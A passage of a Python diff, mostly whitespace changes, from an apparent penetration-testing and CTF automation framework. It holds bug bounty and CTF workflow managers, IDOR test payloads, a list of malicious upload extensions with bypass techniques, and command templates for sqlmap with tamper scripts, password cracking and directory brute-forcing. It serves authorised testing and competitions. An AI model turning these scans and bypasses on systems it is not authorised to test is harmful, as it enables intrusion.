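        response = requests.get(target, timeout=10)
    except requests.RequestException as exc:
        return [{"type": "connection_error", "severity": "info",
                 "description": f"Could not perform basic security check: {exc}"}]
    return [{"type": "missing_security_header", "severity": "low",
             "header": header, "description": description}
            for header, description in SECURITY_HEADERS.items()
            if header not in response.headers]
```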
vulnerabilities - + def _get_manual_recommendations(self, operation: str, failed_components: List[str]) -> List[str]: """Get manual recommendations for failed operations""" recommendations = [] - + base_recommendations = { "network_discovery": [ "Manually test common ports using telnet or nc", @@ -2408,9 +2408,9 @@ class GracefulDegradation: "Perform manual DNS queries" ] } - + recommendations.extend(base_recommendations.get(operation, [])) - + # Add specific recommendations based on failed components for component in failed_components: if component == "nmap": @@ -2419,9 +2419,9 @@ class GracefulDegradation: recommendations.append("Try manual directory browsing") elif component == "nuclei": recommendations.append("Perform manual vulnerability testing") - + return recommendations - + def is_critical_operation(self, operation: str) -> bool: """Check if operation is critical and requires fallback""" return operation in self.critical_operations @@ -2443,10 +2443,10 @@ class BugBountyTarget: program_type: str = "web" # web, api, mobile, iot priority_vulns: List[str] = field(default_factory=lambda: ["rce", "sqli", "xss", "idor", "ssrf"]) bounty_range: str = "unknown" - + class BugBountyWorkflowManager: """Specialized workflow manager for bug bounty hunting""" - + def __init__(self): self.high_impact_vulns = { "rce": {"priority": 10, "tools": ["nuclei", "jaeles", "sqlmap"], "payloads": "command_injection"}, @@ -2458,7 +2458,7 @@ class BugBountyWorkflowManager: "xxe": {"priority": 6, "tools": ["nuclei"], "payloads": "xxe"}, "csrf": {"priority": 5, "tools": ["nuclei"], "payloads": "csrf"} } - + self.reconnaissance_tools = [ {"tool": "amass", "phase": "subdomain_enum", "priority": 1}, {"tool": "subfinder", "phase": "subdomain_enum", "priority": 2}, @@ -2469,7 +2469,7 @@ class BugBountyWorkflowManager: {"tool": "paramspider", "phase": "parameter_discovery", "priority": 7}, {"tool": "arjun", "phase": "parameter_discovery", "priority": 8} ] - + def create_reconnaissance_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create comprehensive reconnaissance workflow for bug bounty""" workflow = { @@ -2478,7 +2478,7 @@ class BugBountyWorkflowManager: "estimated_time": 0, "tools_count": 0 } - + # Phase 1: Subdomain Discovery subdomain_phase = { "name": "subdomain_discovery", @@ -2492,7 +2492,7 @@ class BugBountyWorkflowManager: "estimated_time": 300 } workflow["phases"].append(subdomain_phase) - + # Phase 2: HTTP Service Discovery http_phase = { "name": "http_service_discovery", @@ -2505,7 +2505,7 @@ class BugBountyWorkflowManager: "estimated_time": 180 } workflow["phases"].append(http_phase) - + # Phase 3: Content Discovery content_phase = { "name": "content_discovery", @@ -2520,7 +2520,7 @@ class BugBountyWorkflowManager: "estimated_time": 600 } workflow["phases"].append(content_phase) - + # Phase 4: Parameter Discovery param_phase = { "name": "parameter_discovery", @@ -2534,13 +2534,13 @@ class BugBountyWorkflowManager: "estimated_time": 240 } workflow["phases"].append(param_phase) - + # Calculate totals workflow["estimated_time"] = sum(phase["estimated_time"] for phase in workflow["phases"]) workflow["tools_count"] = sum(len(phase["tools"]) for phase in workflow["phases"]) - + return workflow - + def create_vulnerability_hunting_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create vulnerability hunting workflow prioritized by impact""" workflow = { @@ -2549,16 +2549,16 @@ class BugBountyWorkflowManager: "estimated_time": 0, "priority_score": 0 } - + # Sort vulnerabilities by 
priority - sorted_vulns = sorted(target.priority_vulns, - key=lambda v: self.high_impact_vulns.get(v, {}).get("priority", 0), + sorted_vulns = sorted(target.priority_vulns, + key=lambda v: self.high_impact_vulns.get(v, {}).get("priority", 0), reverse=True) - + for vuln_type in sorted_vulns: if vuln_type in self.high_impact_vulns: vuln_config = self.high_impact_vulns[vuln_type] - + vuln_test = { "vulnerability_type": vuln_type, "priority": vuln_config["priority"], @@ -2567,13 +2567,13 @@ class BugBountyWorkflowManager: "test_scenarios": self._get_test_scenarios(vuln_type), "estimated_time": vuln_config["priority"] * 30 # Higher priority = more time } - + workflow["vulnerability_tests"].append(vuln_test) workflow["estimated_time"] += vuln_test["estimated_time"] workflow["priority_score"] += vuln_config["priority"] - + return workflow - + def _get_test_scenarios(self, vuln_type: str) -> List[Dict[str, Any]]: """Get specific test scenarios for vulnerability types""" scenarios = { @@ -2603,9 +2603,9 @@ class BugBountyWorkflowManager: {"name": "Encoded IDOR", "payloads": ["id=MQ==", "id=Mg=="]} # base64 encoded 1,2 ] } - + return scenarios.get(vuln_type, []) - + def create_business_logic_testing_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create business logic testing workflow""" workflow = { @@ -2649,9 +2649,9 @@ class BugBountyWorkflowManager: "estimated_time": 480, # 8 hours for thorough business logic testing "manual_testing_required": True } - + return workflow - + def create_osint_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create OSINT gathering workflow""" workflow = { @@ -2693,12 +2693,12 @@ class BugBountyWorkflowManager: "estimated_time": 240, "intelligence_types": ["technical", "social", "business", "infrastructure"] } - + return workflow class FileUploadTestingFramework: """Specialized framework for file upload vulnerability testing""" - + def __init__(self): self.malicious_extensions = [ ".php", ".php3", ".php4", ".php5", ".phtml", ".pht", @@ -2706,7 +2706,7 @@ class FileUploadTestingFramework: ".py", ".rb", ".pl", ".cgi", ".sh", ".bat", ".cmd", ".exe" ] - + self.bypass_techniques = [ "double_extension", "null_byte", @@ -2715,7 +2715,7 @@ class FileUploadTestingFramework: "case_variation", "special_characters" ] - + def generate_test_files(self) -> Dict[str, Any]: """Generate various test files for upload testing""" test_files = { @@ -2734,9 +2734,9 @@ class FileUploadTestingFramework: {"name": "polyglot.jpg", "content": "GIF89a", "technique": "image_polyglot"} ] } - + return test_files - + def create_upload_testing_workflow(self, target_url: str) -> Dict[str, Any]: """Create comprehensive file upload testing workflow""" workflow = { @@ -2769,7 +2769,7 @@ class FileUploadTestingFramework: "estimated_time": 360, "risk_level": "high" } - + return workflow # Global bug bounty workflow manager @@ -2794,7 +2794,7 @@ class CTFChallenge: class CTFWorkflowManager: """Specialized workflow manager for CTF competitions""" - + def __init__(self): self.category_tools = { "web": { @@ -2847,7 +2847,7 @@ class CTFWorkflowManager: "geolocation": ["geoint", "osm-analysis", "satellite-imagery"] } } - + self.solving_strategies = { "web": [ {"strategy": "source_code_analysis", "description": "Analyze HTML/JS source for hidden information"}, @@ -2891,7 +2891,7 @@ class CTFWorkflowManager: {"strategy": "key_recovery", "description": "Extract encryption keys from binaries"} ] } - + def create_ctf_challenge_workflow(self, challenge: CTFChallenge) -> Dict[str, Any]: 
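Vulnerability hunting orders the target's priority list by each class's impact rating and budgets time proportionally (priority × 30). A runnable reduction with an abridged priority table:

```python
HIGH_IMPACT_VULNS = {  # abridged; priorities follow the hunk's table
    "rce": {"priority": 10}, "sqli": {"priority": 9},
    "idor": {"priority": 8}, "ssrf": {"priority": 8}, "xss": {"priority": 7},
}

def plan_vuln_tests(priority_vulns):
    ordered = sorted(priority_vulns,
                     key=lambda v: HIGH_IMPACT_VULNS.get(v, {}).get("priority", 0),
                     reverse=True)
    # Higher-priority classes get proportionally more testing time.
    return [{"vulnerability_type": v,
             "estimated_time": HIGH_IMPACT_VULNS[v]["priority"] * 30}
            for v in ordered if v in HIGH_IMPACT_VULNS]

print(plan_vuln_tests(["xss", "rce", "idor"]))
# rce (300s) first, then idor (240s), then xss (210s)
```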
"""Create advanced specialized workflow for CTF challenge with AI-powered optimization""" workflow = { @@ -2911,17 +2911,17 @@ class CTFWorkflowManager: "expected_artifacts": [], "validation_steps": [] } - + # Enhanced tool selection using CTFToolManager ctf_tool_manager = CTFToolManager() workflow["tools"] = ctf_tool_manager.suggest_tools_for_challenge(challenge.description, challenge.category) - + # Get category-specific strategies with enhanced intelligence if challenge.category in self.solving_strategies: workflow["strategies"] = self.solving_strategies[challenge.category] # Add fallback strategies for robustness workflow["fallback_strategies"] = self._generate_fallback_strategies(challenge.category) - + # Advanced time estimation with machine learning-like scoring base_times = { "easy": {"min": 15, "avg": 30, "max": 60}, @@ -2930,7 +2930,7 @@ class CTFWorkflowManager: "insane": {"min": 120, "avg": 240, "max": 480}, "unknown": {"min": 45, "avg": 90, "max": 180} } - + # Factor in category complexity category_multipliers = { "web": 1.0, @@ -2941,16 +2941,16 @@ class CTFWorkflowManager: "misc": 0.8, "osint": 0.9 } - + base_time = base_times[challenge.difficulty]["avg"] category_mult = category_multipliers.get(challenge.category, 1.0) - + # Adjust based on description complexity description_complexity = self._analyze_description_complexity(challenge.description) complexity_mult = 1.0 + (description_complexity * 0.3) - + workflow["estimated_time"] = int(base_time * category_mult * complexity_mult * 60) # Convert to seconds - + # Enhanced success probability calculation base_success = { "easy": 0.85, @@ -2959,31 +2959,31 @@ class CTFWorkflowManager: "insane": 0.25, "unknown": 0.55 }[challenge.difficulty] - + # Adjust based on tool availability and category expertise tool_availability_bonus = min(0.15, len(workflow["tools"]) * 0.02) workflow["success_probability"] = min(0.95, base_success + tool_availability_bonus) - + # Add advanced workflow components workflow["workflow_steps"] = self._create_advanced_category_workflow(challenge) workflow["parallel_tasks"] = self._identify_parallel_tasks(challenge.category) workflow["resource_requirements"] = self._calculate_resource_requirements(challenge) workflow["expected_artifacts"] = self._predict_expected_artifacts(challenge) workflow["validation_steps"] = self._create_validation_steps(challenge.category) - + return workflow - + def _select_tools_for_challenge(self, challenge: CTFChallenge, category_tools: Dict[str, List[str]]) -> List[str]: """Select appropriate tools based on challenge details""" selected_tools = [] - + # Always include reconnaissance tools for the category if "reconnaissance" in category_tools: selected_tools.extend(category_tools["reconnaissance"][:2]) # Top 2 recon tools - + # Add specialized tools based on challenge description description_lower = challenge.description.lower() - + if challenge.category == "web": if any(keyword in description_lower for keyword in ["sql", "injection", "database"]): selected_tools.append("sqlmap") @@ -2993,7 +2993,7 @@ class CTFWorkflowManager: selected_tools.append("wpscan") if any(keyword in description_lower for keyword in ["upload", "file"]): selected_tools.extend(["gobuster", "feroxbuster"]) - + elif challenge.category == "crypto": if any(keyword in description_lower for keyword in ["hash", "md5", "sha"]): selected_tools.extend(["hashcat", "john"]) @@ -3001,14 +3001,14 @@ class CTFWorkflowManager: selected_tools.extend(["rsatool", "factordb"]) if any(keyword in description_lower for keyword 
in ["cipher", "encrypt"]): selected_tools.extend(["cipher-identifier", "cyberchef"]) - + elif challenge.category == "pwn": selected_tools.extend(["checksec", "ghidra", "pwntools"]) if any(keyword in description_lower for keyword in ["heap", "malloc"]): selected_tools.append("glibc-heap-analysis") if any(keyword in description_lower for keyword in ["format", "printf"]): selected_tools.append("format-string-exploiter") - + elif challenge.category == "forensics": if any(keyword in description_lower for keyword in ["image", "jpg", "png"]): selected_tools.extend(["exiftool", "steghide", "stegsolve"]) @@ -3016,15 +3016,15 @@ class CTFWorkflowManager: selected_tools.append("volatility") if any(keyword in description_lower for keyword in ["network", "pcap"]): selected_tools.extend(["wireshark", "tcpdump"]) - + elif challenge.category == "rev": selected_tools.extend(["ghidra", "radare2", "strings"]) if any(keyword in description_lower for keyword in ["packed", "upx"]): selected_tools.extend(["upx", "peid"]) - + # Remove duplicates while preserving order return list(dict.fromkeys(selected_tools)) - + def _create_category_workflow(self, challenge: CTFChallenge) -> List[Dict[str, Any]]: """Create category-specific workflow steps""" workflows = { @@ -3069,7 +3069,7 @@ class CTFWorkflowManager: {"step": 6, "action": "flag_generation", "description": "Generate or extract the flag"} ] } - + return workflows.get(challenge.category, [ {"step": 1, "action": "analysis", "description": "Analyze the challenge"}, {"step": 2, "action": "research", "description": "Research relevant techniques"}, @@ -3078,7 +3078,7 @@ class CTFWorkflowManager: {"step": 5, "action": "refinement", "description": "Refine approach if needed"}, {"step": 6, "action": "flag_submission", "description": "Submit the flag"} ]) - + def create_ctf_team_strategy(self, challenges: List[CTFChallenge], team_size: int = 4) -> Dict[str, Any]: """Create team strategy for CTF competition""" strategy = { @@ -3088,7 +3088,7 @@ class CTFWorkflowManager: "estimated_total_time": 0, "expected_score": 0 } - + # Sort challenges by points/time ratio for optimal strategy challenge_efficiency = [] for challenge in challenges: @@ -3099,19 +3099,19 @@ class CTFWorkflowManager: "efficiency": efficiency, "workflow": workflow }) - + # Sort by efficiency (highest first) challenge_efficiency.sort(key=lambda x: x["efficiency"], reverse=True) - + # Allocate challenges to team members team_workload = [0] * team_size for i, item in enumerate(challenge_efficiency): # Assign to team member with least workload team_member = team_workload.index(min(team_workload)) - + if team_member not in strategy["challenge_allocation"]: strategy["challenge_allocation"][team_member] = [] - + strategy["challenge_allocation"][team_member].append({ "challenge": item["challenge"].name, "category": item["challenge"].category, @@ -3119,15 +3119,15 @@ class CTFWorkflowManager: "estimated_time": item["workflow"]["estimated_time"], "success_probability": item["workflow"]["success_probability"] }) - + team_workload[team_member] += item["workflow"]["estimated_time"] strategy["expected_score"] += item["challenge"].points * item["workflow"]["success_probability"] - + strategy["estimated_total_time"] = max(team_workload) strategy["priority_order"] = [item["challenge"].name for item in challenge_efficiency] - + return strategy - + def _generate_fallback_strategies(self, category: str) -> List[Dict[str, str]]: """Generate fallback strategies for when primary approaches fail""" fallback_strategies = { @@ 
-3182,18 +3182,18 @@ class CTFWorkflowManager: ] } return fallback_strategies.get(category, []) - + def _analyze_description_complexity(self, description: str) -> float: """Analyze challenge description complexity to adjust time estimates""" complexity_score = 0.0 description_lower = description.lower() - + # Length-based complexity if len(description) > 500: complexity_score += 0.3 elif len(description) > 200: complexity_score += 0.1 - + # Technical term density technical_terms = [ "algorithm", "encryption", "decryption", "vulnerability", "exploit", @@ -3202,17 +3202,17 @@ class CTFWorkflowManager: "reverse engineering", "binary analysis", "memory corruption", "heap", "stack", "rop", "shellcode", "payload" ] - + term_count = sum(1 for term in technical_terms if term in description_lower) complexity_score += min(0.4, term_count * 0.05) - + # Multi-step indicators multi_step_indicators = ["first", "then", "next", "after", "finally", "step"] step_count = sum(1 for indicator in multi_step_indicators if indicator in description_lower) complexity_score += min(0.3, step_count * 0.1) - + return min(1.0, complexity_score) - + def _create_advanced_category_workflow(self, challenge: CTFChallenge) -> List[Dict[str, Any]]: """Create advanced category-specific workflow with parallel execution support""" advanced_workflows = { @@ -3285,7 +3285,7 @@ class CTFWorkflowManager: {"step": 7, "action": "verification", "description": "Verify findings and extract flag", "parallel": False, "tools": ["manual"], "estimated_time": 600} ] } - + return advanced_workflows.get(challenge.category, [ {"step": 1, "action": "analysis", "description": "Analyze the challenge", "parallel": False, "tools": ["manual"], "estimated_time": 600}, {"step": 2, "action": "research", "description": "Research relevant techniques", "parallel": False, "tools": ["manual"], "estimated_time": 900}, @@ -3294,7 +3294,7 @@ class CTFWorkflowManager: {"step": 5, "action": "refinement", "description": "Refine approach if needed", "parallel": False, "tools": ["manual"], "estimated_time": 900}, {"step": 6, "action": "flag_submission", "description": "Submit the flag", "parallel": False, "tools": ["manual"], "estimated_time": 300} ]) - + def _identify_parallel_tasks(self, category: str) -> List[Dict[str, Any]]: """Identify tasks that can be executed in parallel for efficiency""" parallel_tasks = { @@ -3334,9 +3334,9 @@ class CTFWorkflowManager: {"task_group": "format_analysis", "tasks": ["file", "binwalk"], "max_concurrent": 2} ] } - + return parallel_tasks.get(category, []) - + def _calculate_resource_requirements(self, challenge: CTFChallenge) -> Dict[str, Any]: """Calculate estimated resource requirements for challenge""" base_requirements = { @@ -3347,7 +3347,7 @@ class CTFWorkflowManager: "gpu_required": False, "special_tools": [] } - + # Adjust based on category category_adjustments = { "web": {"cpu_cores": 4, "memory_mb": 4096, "network_bandwidth": "high"}, @@ -3358,10 +3358,10 @@ class CTFWorkflowManager: "osint": {"cpu_cores": 2, "memory_mb": 2048, "network_bandwidth": "high"}, "misc": {"cpu_cores": 2, "memory_mb": 2048} } - + if challenge.category in category_adjustments: base_requirements.update(category_adjustments[challenge.category]) - + # Adjust based on difficulty difficulty_multipliers = { "easy": 1.0, @@ -3370,14 +3370,14 @@ class CTFWorkflowManager: "insane": 2.0, "unknown": 1.3 } - + multiplier = difficulty_multipliers[challenge.difficulty] base_requirements["cpu_cores"] = int(base_requirements["cpu_cores"] * multiplier) 
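Description complexity is scored from three capped signals: raw length, technical-term density, and multi-step wording, so no single signal dominates. The same logic in isolation (term list abridged):

```python
TECHNICAL_TERMS = ["encryption", "exploit", "buffer overflow", "steganography",
                   "heap", "rop", "shellcode", "payload"]  # abridged list
MULTI_STEP_WORDS = ["first", "then", "next", "after", "finally", "step"]

def description_complexity(description):
    text = description.lower()
    score = 0.3 if len(description) > 500 else 0.1 if len(description) > 200 else 0.0
    term_hits = sum(1 for term in TECHNICAL_TERMS if term in text)
    score += min(0.4, term_hits * 0.05)   # technical-term density, capped
    step_hits = sum(1 for word in MULTI_STEP_WORDS if word in text)
    score += min(0.3, step_hits * 0.1)    # multi-stage indicators, capped
    return min(1.0, score)

text = "First decrypt the payload, then exploit the heap."
print(round(description_complexity(text), 2))  # 0.35
```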
base_requirements["memory_mb"] = int(base_requirements["memory_mb"] * multiplier) base_requirements["disk_space_mb"] = int(base_requirements["disk_space_mb"] * multiplier) - + return base_requirements - + def _predict_expected_artifacts(self, challenge: CTFChallenge) -> List[Dict[str, str]]: """Predict expected artifacts and outputs from challenge solving""" artifacts = { @@ -3431,12 +3431,12 @@ class CTFWorkflowManager: {"type": "intermediate_results", "description": "Intermediate calculation results"} ] } - + return artifacts.get(challenge.category, [ {"type": "solution_data", "description": "Solution-related data"}, {"type": "analysis_results", "description": "Analysis results and findings"} ]) - + def _create_validation_steps(self, category: str) -> List[Dict[str, str]]: """Create validation steps to verify solution correctness""" validation_steps = { @@ -3483,7 +3483,7 @@ class CTFWorkflowManager: {"step": "flag_extraction", "description": "Extract and validate final flag"} ] } - + return validation_steps.get(category, [ {"step": "general_validation", "description": "General solution validation"}, {"step": "flag_verification", "description": "Verify flag format and correctness"} @@ -3491,7 +3491,7 @@ class CTFWorkflowManager: class CTFToolManager: """Advanced tool manager for CTF challenges with comprehensive tool arsenal""" - + def __init__(self): self.tool_commands = { # Web Application Security Tools @@ -3507,7 +3507,7 @@ class CTFToolManager: "wpscan": "wpscan --url {} --enumerate ap,at,cb,dbe", "nikto": "nikto -h {} -C all", "whatweb": "whatweb -v -a 3", - + # Cryptography Challenge Tools "hashcat": "hashcat -m 0 -a 0 --potfile-disable --quiet", "john": "john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5", @@ -3528,7 +3528,7 @@ class CTFToolManager: "base32": "base32 -d", "hex": "xxd -r -p", "rot13": "tr 'A-Za-z' 'N-ZA-Mn-za-m'", - + # Binary Exploitation (Pwn) Tools "checksec": "checksec --file", "pwntools": "python3 -c 'from pwn import *; context.log_level = \"debug\"'", @@ -3553,7 +3553,7 @@ class CTFToolManager: "hexdump": "hexdump -C", "pwninit": "pwninit", "libc-database": "python3 /opt/libc-database/find.py", - + # Forensics Investigation Tools "binwalk": "binwalk -e --dd='.*'", "foremost": "foremost -i {} -o /tmp/foremost_output", @@ -3577,7 +3577,7 @@ class CTFToolManager: "bulk-extractor": "bulk_extractor -o /tmp/bulk_output", "ddrescue": "ddrescue", "dc3dd": "dc3dd", - + # Reverse Engineering Tools "ida": "ida64", "ida-free": "ida64 -A", @@ -3596,7 +3596,7 @@ class CTFToolManager: "dnspy": "dnspy", "ilspy": "ilspy", "dotpeek": "dotpeek", - + # OSINT and Reconnaissance Tools "sherlock": "sherlock", "social-analyzer": "social-analyzer", @@ -3619,7 +3619,7 @@ class CTFToolManager: "waybackurls": "waybackurls", "gau": "gau", "httpx-osint": "httpx -title -tech-detect -status-code", - + # Miscellaneous Challenge Tools "qr-decoder": "zbarimg", "barcode-decoder": "zbarimg", @@ -3640,7 +3640,7 @@ class CTFToolManager: "xz": "unxz", "lzma": "unlzma", "compress": "uncompress", - + # Modern Web Technologies "jwt-tool": "python3 /opt/jwt_tool/jwt_tool.py", "jwt-cracker": "jwt-cracker", @@ -3650,7 +3650,7 @@ class CTFToolManager: "burpsuite": "java -jar /opt/burpsuite/burpsuite.jar", "owasp-zap": "zap.sh -cmd", "websocket-king": "python3 /opt/websocket-king/ws_test.py", - + # Cloud and Container Security "docker": "docker", "kubectl": "kubectl", @@ -3659,7 +3659,7 @@ class CTFToolManager: "gcloud": "gcloud", "terraform": "terraform", "ansible": "ansible", - + # Mobile 
Application Security "adb": "adb", "frida": "frida", @@ -3668,7 +3668,7 @@ class CTFToolManager: "apkleaks": "apkleaks -f", "qark": "qark --apk" } - + # Tool categories for intelligent selection self.tool_categories = { "web_recon": ["httpx", "katana", "waybackurls", "gau", "whatweb"], @@ -3697,11 +3697,11 @@ class CTFToolManager: "misc_compression": ["zip", "7zip", "rar", "tar"], "misc_esoteric": ["brainfuck", "whitespace", "piet", "malbolge"] } - + def get_tool_command(self, tool: str, target: str, additional_args: str = "") -> str: """Get optimized command for CTF tool with intelligent parameter selection""" base_command = self.tool_commands.get(tool, tool) - + # Add intelligent parameter optimization based on tool type if tool in ["hashcat", "john"]: # For hash cracking, add common wordlists and rules @@ -3709,14 +3709,14 @@ class CTFToolManager: base_command += " --wordlist=/usr/share/wordlists/rockyou.txt" if tool == "hashcat" and "--rules" not in base_command: base_command += " --rules-file=/usr/share/hashcat/rules/best64.rule" - + elif tool in ["sqlmap"]: # For SQL injection, add tamper scripts and optimization if "--tamper" not in base_command: base_command += " --tamper=space2comment,charencode,randomcase" if "--threads" not in base_command: base_command += " --threads=5" - + elif tool in ["gobuster", "dirsearch", "feroxbuster"]: # For directory brute forcing, optimize threads and extensions if tool == "gobuster" and "-t" not in base_command: @@ -3725,25 +3725,25 @@ class CTFToolManager: base_command += " -t 50" elif tool == "feroxbuster" and "-t" not in base_command: base_command += " -t 50" - + if additional_args: return f"{base_command} {additional_args} {target}" else: return f"{base_command} {target}" - + def get_category_tools(self, category: str) -> List[str]: """Get all tools for a specific category""" return self.tool_categories.get(category, []) - + def suggest_tools_for_challenge(self, challenge_description: str, category: str) -> List[str]: """Suggest optimal tools based on challenge description and category""" suggested_tools = [] description_lower = challenge_description.lower() - + # Category-based tool suggestions if category == "web": suggested_tools.extend(self.tool_categories["web_recon"][:2]) - + if any(keyword in description_lower for keyword in ["sql", "injection", "database", "mysql", "postgres"]): suggested_tools.extend(["sqlmap", "hash-identifier"]) if any(keyword in description_lower for keyword in ["xss", "script", "javascript", "dom"]): @@ -3758,7 +3758,7 @@ class CTFToolManager: suggested_tools.append("jwt-tool") if any(keyword in description_lower for keyword in ["graphql", "api"]): suggested_tools.append("graphql-voyager") - + elif category == "crypto": if any(keyword in description_lower for keyword in ["hash", "md5", "sha", "password"]): suggested_tools.extend(["hashcat", "john", "hash-identifier"]) @@ -3774,10 +3774,10 @@ class CTFToolManager: suggested_tools.append("rot13") if any(keyword in description_lower for keyword in ["pgp", "gpg", "signature"]): suggested_tools.append("gpg") - + elif category == "pwn": suggested_tools.extend(["checksec", "file", "strings"]) - + if any(keyword in description_lower for keyword in ["buffer", "overflow", "bof"]): suggested_tools.extend(["pwntools", "gdb-peda", "ropper"]) if any(keyword in description_lower for keyword in ["format", "printf", "string"]): @@ -3790,7 +3790,7 @@ class CTFToolManager: suggested_tools.extend(["pwntools", "one-gadget"]) if any(keyword in description_lower for keyword in ["canary", 
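`get_tool_command` builds the final command line by appending sensible defaults only when the matching flag is absent from the base command. A trimmed sketch with a two-entry command table (paths and flag values are illustrative, not the project's full arsenal):

```python
TOOL_COMMANDS = {  # abridged; the real table holds the whole arsenal
    "john": "john --format=Raw-MD5",
    "gobuster": "gobuster dir",
}

def get_tool_command(tool, target, additional_args=""):
    command = TOOL_COMMANDS.get(tool, tool)
    # Append defaults only when the flag is not already present.
    if tool == "john" and "--wordlist" not in command:
        command += " --wordlist=/usr/share/wordlists/rockyou.txt"
    if tool == "gobuster" and " -t " not in command:
        command += " -t 30"
    if additional_args:
        command += f" {additional_args}"
    if tool == "gobuster":
        return f"{command} -u {target}"
    return f"{command} {target}"

print(get_tool_command("gobuster", "http://target.example", "-x php,html"))
# gobuster dir -t 30 -x php,html -u http://target.example
```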
"stack", "protection"]): suggested_tools.extend(["checksec", "pwntools"]) - + elif category == "forensics": if any(keyword in description_lower for keyword in ["image", "jpg", "png", "gif", "steganography"]): suggested_tools.extend(["exiftool", "steghide", "stegsolve", "zsteg"]) @@ -3804,10 +3804,10 @@ class CTFToolManager: suggested_tools.extend(["testdisk", "sleuthkit"]) if any(keyword in description_lower for keyword in ["audio", "wav", "mp3", "sound"]): suggested_tools.extend(["audacity", "sonic-visualizer"]) - + elif category == "rev": suggested_tools.extend(["file", "strings", "objdump"]) - + if any(keyword in description_lower for keyword in ["packed", "upx", "packer"]): suggested_tools.extend(["upx", "peid", "detect-it-easy"]) if any(keyword in description_lower for keyword in ["android", "apk", "mobile"]): @@ -3820,7 +3820,7 @@ class CTFToolManager: suggested_tools.extend(["ghidra", "ida", "x64dbg"]) if any(keyword in description_lower for keyword in ["linux", "elf", "binary"]): suggested_tools.extend(["ghidra", "radare2", "gdb-peda"]) - + elif category == "osint": if any(keyword in description_lower for keyword in ["username", "social", "media"]): suggested_tools.extend(["sherlock", "social-analyzer"]) @@ -3832,7 +3832,7 @@ class CTFToolManager: suggested_tools.extend(["shodan", "censys"]) if any(keyword in description_lower for keyword in ["whois", "registration", "owner"]): suggested_tools.append("whois") - + elif category == "misc": if any(keyword in description_lower for keyword in ["qr", "barcode", "code"]): suggested_tools.append("qr-decoder") @@ -3844,7 +3844,7 @@ class CTFToolManager: suggested_tools.append("whitespace") if any(keyword in description_lower for keyword in ["piet", "image", "program"]): suggested_tools.append("piet") - + # Remove duplicates while preserving order return list(dict.fromkeys(suggested_tools)) @@ -3854,13 +3854,13 @@ class CTFToolManager: class CTFChallengeAutomator: """Advanced automation system for CTF challenge solving""" - + def __init__(self): self.active_challenges = {} self.solution_cache = {} self.learning_database = {} self.success_patterns = {} - + def auto_solve_challenge(self, challenge: CTFChallenge) -> Dict[str, Any]: """Attempt to automatically solve a CTF challenge""" result = { @@ -3874,48 +3874,48 @@ class CTFChallengeAutomator: "flag_candidates": [], "next_actions": [] } - + try: # Create workflow workflow = ctf_manager.create_ctf_challenge_workflow(challenge) - + # Execute automated steps for step in workflow["workflow_steps"]: if step.get("parallel", False): step_result = self._execute_parallel_step(step, challenge) else: step_result = self._execute_sequential_step(step, challenge) - + result["automated_steps"].append(step_result) - + # Check for flag candidates flag_candidates = self._extract_flag_candidates(step_result.get("output", "")) result["flag_candidates"].extend(flag_candidates) - + # Update confidence based on step success if step_result.get("success", False): result["confidence"] += 0.1 - + # Early termination if flag found if flag_candidates and self._validate_flag_format(flag_candidates[0]): result["status"] = "solved" result["flag"] = flag_candidates[0] break - + # If not solved automatically, provide manual guidance if result["status"] != "solved": result["manual_steps"] = self._generate_manual_guidance(challenge, result) result["status"] = "needs_manual_intervention" - + result["confidence"] = min(1.0, result["confidence"]) - + except Exception as e: result["status"] = "error" result["error"] = str(e) 
logger.error(f"Error in auto-solve for {challenge.name}: {str(e)}") - + return result - + def _execute_parallel_step(self, step: Dict[str, Any], challenge: CTFChallenge) -> Dict[str, Any]: """Execute a step with parallel tool execution""" step_result = { @@ -3927,10 +3927,10 @@ class CTFChallengeAutomator: "execution_time": 0, "artifacts": [] } - + start_time = time.time() tools = step.get("tools", []) - + # Execute tools in parallel (simulated for now) for tool in tools: try: @@ -3942,10 +3942,10 @@ class CTFChallengeAutomator: step_result["success"] = True except Exception as e: step_result["output"] += f"[{tool}] Error: {str(e)}\n" - + step_result["execution_time"] = time.time() - start_time return step_result - + def _execute_sequential_step(self, step: Dict[str, Any], challenge: CTFChallenge) -> Dict[str, Any]: """Execute a step sequentially""" step_result = { @@ -3957,10 +3957,10 @@ class CTFChallengeAutomator: "execution_time": 0, "artifacts": [] } - + start_time = time.time() tools = step.get("tools", []) - + for tool in tools: try: if tool == "manual": @@ -3976,10 +3976,10 @@ class CTFChallengeAutomator: step_result["success"] = True except Exception as e: step_result["output"] += f"[{tool}] Error: {str(e)}\n" - + step_result["execution_time"] = time.time() - start_time return step_result - + def _extract_flag_candidates(self, output: str) -> List[str]: """Extract potential flags from tool output""" flag_patterns = [ @@ -3992,14 +3992,14 @@ class CTFChallengeAutomator: r'[0-9a-f]{40}', # SHA1 hash r'[0-9a-f]{64}' # SHA256 hash ] - + candidates = [] for pattern in flag_patterns: matches = re.findall(pattern, output, re.IGNORECASE) candidates.extend(matches) - + return list(set(candidates)) # Remove duplicates - + def _validate_flag_format(self, flag: str) -> bool: """Validate if a string matches common flag formats""" common_formats = [ @@ -4009,32 +4009,32 @@ class CTFChallengeAutomator: r'^CTF\{.+\}$', r'^[a-zA-Z0-9_]+\{.+\}$' ] - + for pattern in common_formats: if re.match(pattern, flag, re.IGNORECASE): return True - + return False - + def _generate_manual_guidance(self, challenge: CTFChallenge, current_result: Dict[str, Any]) -> List[Dict[str, str]]: """Generate manual guidance when automation fails""" guidance = [] - + # Analyze what was attempted attempted_tools = [] for step in current_result["automated_steps"]: attempted_tools.extend(step.get("tools_used", [])) - + # Suggest alternative approaches all_category_tools = ctf_tools.get_category_tools(f"{challenge.category}_recon") unused_tools = [tool for tool in all_category_tools if tool not in attempted_tools] - + if unused_tools: guidance.append({ "action": "try_alternative_tools", "description": f"Try these alternative tools: {', '.join(unused_tools[:3])}" }) - + # Category-specific guidance if challenge.category == "web": guidance.extend([ @@ -4066,18 +4066,18 @@ class CTFChallengeAutomator: {"action": "key_extraction", "description": "Extract hardcoded keys or important values"}, {"action": "dynamic_analysis", "description": "Use dynamic analysis to understand runtime behavior"} ]) - + return guidance class CTFTeamCoordinator: """Coordinate team efforts in CTF competitions""" - + def __init__(self): self.team_members = {} self.challenge_assignments = {} self.team_communication = [] self.shared_resources = {} - + def optimize_team_strategy(self, challenges: 